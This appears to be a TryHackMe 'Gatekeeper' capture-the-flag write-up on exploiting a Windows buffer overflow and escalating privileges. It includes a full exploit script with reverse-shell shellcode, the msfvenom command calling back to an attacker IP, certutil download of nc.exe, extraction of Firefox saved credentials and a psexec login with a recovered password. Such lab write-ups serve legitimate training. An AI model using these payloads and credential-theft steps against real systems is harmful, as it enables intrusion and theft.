Gatekeeper (W/THM)

Basic OSCP like Buffer Overflow

TryHackMe – Gatekeeper Write-Up

topics: Buffer Overflows, Windows Privilege Escalation, windows buffer overflows, hashed credentials, firefox_decrypt, psexec

1. Enumeration

2. Local Privilege Escalation

3. System Privilege Escalation

new tools: Immunity Debugger

tools: nmapAutomator, python, msfvenom, nc

let me INNNNNNNN

Enumeration

initial nmap scan .././autonmap.sh $ip Basic

There are several ports open on this server and we can clearly see the host name is GATEKEEPER running Windows 7.

nmap suggests it could be vulnerable to Eternal Blue but a quick check confirms that is a rabbit hole.

SMB

smbclient -L //10.10.161.165 -N

There seems to be information on the Users share, lets download all the contents and inspect

Inspecting Default reveals profile settings while Share contains a Windows executable that we can debug

"Elite?"

This is a very obscure port and definitely unique to this box. The homepage of this port seems to list the GET request and "Hello!!!" with no other information. We can surmise that this port, because the box contains a buffer overflow exploit, accepts input and returns "Hello!!!"

We can test this using nc and indeed find that this port accepts unauthorized input.

Entering a certain number of characters seems to crash the service.

Local Privilege Escalation

To find another program to properly debug a Windows exe file on Linux or find symbol tables to use gdb would be too time consuming, instead I transferred the exe file to a Windows 10 VM and used Immunity Debugger. Make sure your VM has this x86 program installed, is running on NAT network and port 31337 is open. Run gatekeeper.exe and attach on Immunity Debugger, click play on Immunity Debugger and begin finding the offset

Finding Offset

We need to fuzz the program to determine at which point will the EIP overflow. We can use pattern_create.rb to generate a string and use the following python program to open a socket and input the string to the listening executable file.

Alternatively we can also run nc -v 10.0.2.15 31337 and manually input the string

We can see the overwritten value of the instruction pointer (EIP) is 39654138. We can use pattern_offset.rb to determine the value of the offset.

pattern_offset.rb -l 200 -q 39654138

Now we have an offset of length 146 to use A's or NOP sled with payload = "\x90" * 146 + "JMP ESP" + "\x90" * remainder bytes + shellcode

Identifying Bad Characters

Using this git repo I started an nc connection on port 31337 and sent the bad characters to the program.

Right click on the stack pointer ESP and follow the hex dump.

We can see in the hex dump that the bad characters will be "\x0a" and "\x00"

Finding JMP ESP Address

To find the address we want to JMP to in the stack pointer (ESP), we can use the command !mona jmp -r esp -m gatekeeper.exe (I had to manually install mona.py to the pycommands folder)

We see our address is 0x080414c3 which in little endian syntax will be \xc3\x14\x04\x08

payload = "\x90" * 146 + "\xc3\x14\x04\x08" + "\x90" * remainder bytes + shellcode

Generating Shellcode

Generating shellcode to open a reverse shell will be fairly easy, we just need to run the following msfvenom command and input the bad characters we found

msfvenom -p windows/shell_reverse_tcp LHOST=10.6.18.145 LPORT=53 -f c -a x86 --platform windows -e x86/shikata_ga_nai -b "\x00\x0a"

Initial Access

The remainder bytes are usually calculated depending on the size of the buffer, doing trial and error the minimum number of NOP sleds needed is 5. We now have all of the attributes needed to exploit this buffer overflow and gain a reverse shell. Listening on port 53 and running the program python gatekeeper.py

#!/usr/bin/env python

# Skeleton Buffer Overflow script
# usage python gatekeeper.py <targetIP> <targetPort>

import sys, socket

rhost = sys.argv[1]
rport = int(sys.argv[2])

# msfvenom -p windows/shell_reverse_tcp LHOST=10.6.18.145 LPORT=53 -f c -a x86 --platform windows -e x86/shikata_ga_nai -b "\x00\x0a"
shellcode = ("\xb8\x50\xc6\x7c\xfb\xda\xdf\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"
"\x52\x31\x43\x12\x83\xeb\xfc\x03\x13\xc8\x9e\x0e\x6f\x3c\xdc"
"\xf1\x8f\xbd\x81\x78\x6a\x8c\x81\x1f\xff\xbf\x31\x6b\xad\x33"
"\xb9\x39\x45\xc7\xcf\x95\x6a\x60\x65\xc0\x45\x71\xd6\x30\xc4"
"\xf1\x25\x65\x26\xcb\xe5\x78\x27\x0c\x1b\x70\x75\xc5\x57\x27"
"\x69\x62\x2d\xf4\x02\x38\xa3\x7c\xf7\x89\xc2\xad\xa6\x82\x9c"
"\x6d\x49\x46\x95\x27\x51\x8b\x90\xfe\xea\x7f\x6e\x01\x3a\x4e"
"\x8f\xae\x03\x7e\x62\xae\x44\xb9\x9d\xc5\xbc\xb9\x20\xde\x7b"
"\xc3\xfe\x6b\x9f\x63\x74\xcb\x7b\x95\x59\x8a\x08\x99\x16\xd8"
"\x56\xbe\xa9\x0d\xed\xba\x22\xb0\x21\x4b\x70\x97\xe5\x17\x22"
"\xb6\xbc\xfd\x85\xc7\xde\x5d\x79\x62\x95\x70\x6e\x1f\xf4\x1c"
"\x43\x12\x06\xdd\xcb\x25\x75\xef\x54\x9e\x11\x43\x1c\x38\xe6"
"\xa4\x37\xfc\x78\x5b\xb8\xfd\x51\x98\xec\xad\xc9\x09\x8d\x25"
"\x09\xb5\x58\xe9\x59\x19\x33\x4a\x09\xd9\xe3\x22\x43\xd6\xdc"
"\x53\x6c\x3c\x75\xf9\x97\xd7\x70\xf8\x85\xb6\xed\x06\xa9\xb8"
"\xd8\x8f\x4f\xd2\x32\xc6\xd8\x4b\xaa\x43\x92\xea\x33\x5e\xdf"
"\x2d\xbf\x6d\x20\xe3\x48\x1b\x32\x94\xb8\x56\x68\x33\xc6\x4c"
"\x04\xdf\x55\x0b\xd4\x96\x45\x84\x83\xff\xb8\xdd\x41\x12\xe2"
"\x77\x77\xef\x72\xbf\x33\x34\x47\x3e\xba\xb9\xf3\x64\xac\x07"
"\xfb\x20\x98\xd7\xaa\xfe\x76\x9e\x04\xb1\x20\x48\xfa\x1b\xa4"
"\x0d\x30\x9c\xb2\x11\x1d\x6a\x5a\xa3\xc8\x2b\x65\x0c\x9d\xbb"
"\x1e\x70\x3d\x43\xf5\x30\x4d\x0e\x57\x10\xc6\xd7\x02\x20\x8b"
"\xe7\xf9\x67\xb2\x6b\x0b\x18\x41\x73\x7e\x1d\x0d\x33\x93\x6f"
"\x1e\xd6\x93\xdc\x1f\xf3")

payload = "\x90" * 146 + "\xc3\x14\x04\x08" + "\x90" * 5 + shellcode

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
c = s.connect((rhost, rport))
s.send(payload + '\r\n')
data = s.recv(1024)
s.close()

System Privilege Escalation

I was unable to successfully transfer files over HTTP or use powershell to invoke all checks. I also had issues using an SMB server and running winPEAS as well as Seatbelt. Instead I decided to look for any clues in the default folder.

There exists a Firefox.lnk file which is used by Windows as a reference to an original file, folder, or application. Listing the contents of the file

It seems to point to a hidden location \Appdata. Firefox does possess credentials stored in the files below

We'll need to transfer these files as well as cert9.db and cookies.sqlite, the page also gives the location of these files. We can decrypt these with firefox_decrypt and use psexec.py to establish a shell.

Download nc.exe from the attacker with certutil.exe and transfer the four files.

make sure to verify the size of the files

Crack the hashes python firefox_decrypt.py /root/gatekeeper/fire/

Now that we have the admin credentials, we can login with psexec.py python3 /usr/share/doc/python3-impacket/examples/psexec.py gatekeeper/mayor:8CL7O1N78MdrCIsV@10.10.208.42 cmd.exe